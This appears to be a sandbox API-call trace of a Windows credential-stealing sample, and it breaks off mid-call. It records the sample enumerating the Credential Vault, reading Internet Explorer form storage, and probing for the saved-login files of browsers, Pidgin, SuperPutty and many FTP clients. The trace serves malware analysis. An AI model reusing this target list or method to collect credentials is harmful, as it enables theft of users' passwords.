LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.337] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 0 [0063.337] GetProcessHeap () returned 0x620000 [0063.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b1c0 | out: hHeap=0x620000) returned 1 [0063.338] GetProcessHeap () returned 0x620000 [0063.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638518 | out: hHeap=0x620000) returned 1 [0063.352] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x70320000 [0063.366] GetProcAddress (hModule=0x70320000, lpProcName="VaultEnumerateItems") returned 0x7032b960 [0063.366] GetProcAddress (hModule=0x70320000, lpProcName="VaultEnumerateVaults") returned 0x70343510 [0063.367] GetProcAddress (hModule=0x70320000, lpProcName="VaultFree") returned 0x70337050 [0063.367] GetProcAddress (hModule=0x70320000, lpProcName="VaultGetItem") returned 0x7032bb70 [0063.368] GetProcAddress (hModule=0x70320000, lpProcName="VaultGetItem") returned 0x7032bb70 [0063.368] GetProcAddress (hModule=0x70320000, lpProcName="VaultOpenVault") returned 0x7032bc10 [0063.368] GetProcAddress (hModule=0x70320000, lpProcName="VaultCloseVault") returned 0x7032bc90 [0063.369] GetVersionExW (in: lpVersionInformation=0x19fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x1982dfc2, dwMinorVersion=0x19fb5c, dwBuildNumber=0x0, dwPlatformId=0x408323, szCSDVersion="꒠b쾓睹") | out: lpVersionInformation=0x19fa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0063.369] VaultEnumerateVaults () returned 0x0 [0063.376] GetProcessHeap () returned 0x620000 [0063.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63a478 [0063.376] GetProcessHeap () returned 0x620000 [0063.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b680 [0063.376] VaultOpenVault () returned 0x0 [0063.377] VaultEnumerateItems () returned 0x0 [0063.378] VaultFree () returned 0x0 [0063.378] VaultCloseVault () returned 0x6 [0063.381] VaultOpenVault () returned 0x0 [0063.381] VaultEnumerateItems () returned 0x0 [0063.385] VaultFree () returned 0x0 [0063.385] VaultCloseVault () returned 0x6 [0063.386] GetProcessHeap () returned 0x620000 [0063.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.386] GetProcessHeap () returned 0x620000 [0063.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b680 | out: hHeap=0x620000) returned 1 [0063.386] GetProcessHeap () returned 0x620000 [0063.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63a478 [0063.386] GetProcessHeap () returned 0x620000 [0063.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b680 [0063.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0063.388] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", phkResult=0x19fbb8 | out: phkResult=0x19fbb8*=0x0) returned 0x2 [0063.388] GetProcessHeap () returned 0x620000 [0063.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.388] GetProcessHeap () returned 0x620000 [0063.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b680 | out: hHeap=0x620000) returned 1 [0063.389] GetProcessHeap () returned 0x620000 [0063.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.389] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.390] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0063.390] GetProcessHeap () returned 0x620000 [0063.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f50) returned 0x63aca0 [0063.390] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.391] wvsprintfW (in: param_1=0x63aca0, param_2="%s\\Opera", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 43 [0063.391] GetProcessHeap () returned 0x620000 [0063.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5a) returned 0x638d10 [0063.391] GetProcessHeap () returned 0x620000 [0063.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63aca0 | out: hHeap=0x620000) returned 1 [0063.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.392] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 0 [0063.392] GetProcessHeap () returned 0x620000 [0063.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.393] GetProcessHeap () returned 0x620000 [0063.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638d10 | out: hHeap=0x620000) returned 1 [0063.393] GetProcessHeap () returned 0x620000 [0063.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63a478 [0063.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.394] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox86", pszValue="RootDir", pdwType=0x0, pvData=0x63a478, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x63a478, pcbData=0x19fba4*=0x104) returned 0x2 [0063.394] GetProcessHeap () returned 0x620000 [0063.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.394] GetProcessHeap () returned 0x620000 [0063.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63a478 [0063.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.395] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox", pszValue="Path", pdwType=0x0, pvData=0x63a478, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x63a478, pcbData=0x19fba4*=0x104) returned 0x2 [0063.395] GetProcessHeap () returned 0x620000 [0063.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.395] GetProcessHeap () returned 0x620000 [0063.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63a478 [0063.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.396] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Pale Moon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x63a478, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x63a478, pcbData=0x19fba4*=0x104) returned 0x2 [0063.396] GetProcessHeap () returned 0x620000 [0063.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.397] GetProcessHeap () returned 0x620000 [0063.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x63a478 [0063.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.397] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Waterfox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x63a478, pcbData=0x19fb90*=0x104 | out: pdwType=0x0, pvData=0x63a478, pcbData=0x19fb90*=0x104) returned 0x2 [0063.398] GetProcessHeap () returned 0x620000 [0063.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.409] GetProcessHeap () returned 0x620000 [0063.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x63aca0 [0063.410] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.411] wvsprintfW (in: param_1=0x63aca0, param_2="%s\\.purple\\accounts.xml", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 58 [0063.411] GetProcessHeap () returned 0x620000 [0063.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x78) returned 0x6373a0 [0063.411] GetProcessHeap () returned 0x620000 [0063.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63aca0 | out: hHeap=0x620000) returned 1 [0063.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.412] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 0 [0063.412] GetProcessHeap () returned 0x620000 [0063.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6373a0 | out: hHeap=0x620000) returned 1 [0063.422] GetProcessHeap () returned 0x620000 [0063.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.423] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.423] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0063.424] GetProcessHeap () returned 0x620000 [0063.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5a) returned 0x63b4a8 [0063.425] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.426] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\SuperPutty", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 42 [0063.426] GetProcessHeap () returned 0x620000 [0063.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x638b60 [0063.426] GetProcessHeap () returned 0x620000 [0063.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.427] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 0 [0063.427] GetProcessHeap () returned 0x620000 [0063.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.428] GetProcessHeap () returned 0x620000 [0063.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.441] GetProcessHeap () returned 0x620000 [0063.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.441] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.442] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.442] GetProcessHeap () returned 0x620000 [0063.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f70) returned 0x63b4a8 [0063.443] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.443] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\FTPShell\\ftpshell.fsi", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 44 [0063.443] GetProcessHeap () returned 0x620000 [0063.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x638b60 [0063.443] GetProcessHeap () returned 0x620000 [0063.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.445] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 0 [0063.445] GetProcessHeap () returned 0x620000 [0063.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.446] GetProcessHeap () returned 0x620000 [0063.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.446] GetProcessHeap () returned 0x620000 [0063.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f9a) returned 0x63b4a8 [0063.447] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.447] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 80 [0063.447] GetProcessHeap () returned 0x620000 [0063.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa4) returned 0x63a478 [0063.447] GetProcessHeap () returned 0x620000 [0063.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.448] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 0 [0063.449] GetProcessHeap () returned 0x620000 [0063.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.449] GetProcessHeap () returned 0x620000 [0063.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.452] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.453] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.453] GetProcessHeap () returned 0x620000 [0063.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f74) returned 0x63b4a8 [0063.453] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.454] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\oZone3D\\MyFTP\\myftp.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 46 [0063.454] GetProcessHeap () returned 0x620000 [0063.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x638b60 [0063.454] GetProcessHeap () returned 0x620000 [0063.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.456] PathFileExistsW (pszPath="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 0 [0063.456] GetProcessHeap () returned 0x620000 [0063.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.456] GetProcessHeap () returned 0x620000 [0063.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.456] GetProcessHeap () returned 0x620000 [0063.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x63b4a8 [0063.457] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.458] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\FTPBox\\profiles.conf", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 58 [0063.458] GetProcessHeap () returned 0x620000 [0063.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x78) returned 0x637520 [0063.458] GetProcessHeap () returned 0x620000 [0063.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.459] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 0 [0063.459] GetProcessHeap () returned 0x620000 [0063.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637520 | out: hHeap=0x620000) returned 1 [0063.460] GetProcessHeap () returned 0x620000 [0063.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.460] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.461] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.461] GetProcessHeap () returned 0x620000 [0063.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f94) returned 0x63b4a8 [0063.461] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.462] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\Sherrod Computers\\sherrod FTP\\favorites", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 62 [0063.462] GetProcessHeap () returned 0x620000 [0063.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x638b60 [0063.462] GetProcessHeap () returned 0x620000 [0063.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.463] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 0 [0063.464] GetProcessHeap () returned 0x620000 [0063.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.464] GetProcessHeap () returned 0x620000 [0063.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.464] GetProcessHeap () returned 0x620000 [0063.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.466] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.467] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.467] GetProcessHeap () returned 0x620000 [0063.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f68) returned 0x63b4a8 [0063.468] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.469] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\FTP Now\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 40 [0063.469] GetProcessHeap () returned 0x620000 [0063.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x638b60 [0063.469] GetProcessHeap () returned 0x620000 [0063.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.471] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 0 [0063.471] GetProcessHeap () returned 0x620000 [0063.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.471] GetProcessHeap () returned 0x620000 [0063.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.472] GetProcessHeap () returned 0x620000 [0063.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.473] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.473] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.473] GetProcessHeap () returned 0x620000 [0063.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f82) returned 0x63b4a8 [0063.475] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.476] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\NexusFile\\userdata\\ftpsite.ini", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 53 [0063.476] GetProcessHeap () returned 0x620000 [0063.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6e) returned 0x638b60 [0063.476] GetProcessHeap () returned 0x620000 [0063.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.477] PathFileExistsW (pszPath="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 0 [0063.477] GetProcessHeap () returned 0x620000 [0063.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.478] GetProcessHeap () returned 0x620000 [0063.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.478] GetProcessHeap () returned 0x620000 [0063.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f70) returned 0x63b4a8 [0063.478] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.479] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\NexusFile\\ftpsite.ini", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 59 [0063.479] GetProcessHeap () returned 0x620000 [0063.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x638b60 [0063.479] GetProcessHeap () returned 0x620000 [0063.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.480] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 0 [0063.480] GetProcessHeap () returned 0x620000 [0063.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.481] GetProcessHeap () returned 0x620000 [0063.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.481] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.482] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0063.482] GetProcessHeap () returned 0x620000 [0063.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f74) returned 0x63b4a8 [0063.482] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.483] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 55 [0063.483] GetProcessHeap () returned 0x620000 [0063.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x6371a0 [0063.483] GetProcessHeap () returned 0x620000 [0063.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.484] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 0 [0063.484] GetProcessHeap () returned 0x620000 [0063.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.484] GetProcessHeap () returned 0x620000 [0063.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6371a0 | out: hHeap=0x620000) returned 1 [0063.485] GetProcessHeap () returned 0x620000 [0063.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.485] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.486] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0063.486] GetProcessHeap () returned 0x620000 [0063.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f74) returned 0x63b4a8 [0063.486] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.487] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 61 [0063.487] GetProcessHeap () returned 0x620000 [0063.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7e) returned 0x638b60 [0063.487] GetProcessHeap () returned 0x620000 [0063.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.488] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 0 [0063.488] GetProcessHeap () returned 0x620000 [0063.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.489] GetProcessHeap () returned 0x620000 [0063.489] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.506] GetProcessHeap () returned 0x620000 [0063.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63a478 [0063.507] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.507] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x63a478 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0063.507] GetProcessHeap () returned 0x620000 [0063.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x63b4a8 [0063.508] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.508] wvsprintfW (in: param_1=0x63b4a8, param_2="%s\\EasyFTP\\data", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\EasyFTP\\data") returned 35 [0063.508] GetProcessHeap () returned 0x620000 [0063.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a) returned 0x638b60 [0063.508] GetProcessHeap () returned 0x620000 [0063.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4a8 | out: hHeap=0x620000) returned 1 [0063.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.510] PathFileExistsW (pszPath="C:\\Program Files (x86)\\EasyFTP\\data") returned 0 [0063.510] GetProcessHeap () returned 0x620000 [0063.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a478 | out: hHeap=0x620000) returned 1 [0063.510] GetProcessHeap () returned 0x620000 [0063.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638b60 | out: hHeap=0x620000) returned 1 [0063.511] GetProcessHeap () returned 0x620000 [0063.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e8) returned 0x63a478 [0063.511] GetProcessHeap () returned 0x620000 [0063.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x62b488 [0063.511] GetProcessHeap () returned 0x620000 [0063.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63b4a8 [0063.511] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0063.528] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63b4a8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0063.528] GetProcessHeap () returned 0x620000 [0063.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x63b6b8 [0063.529] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.530] wvsprintfW (in: 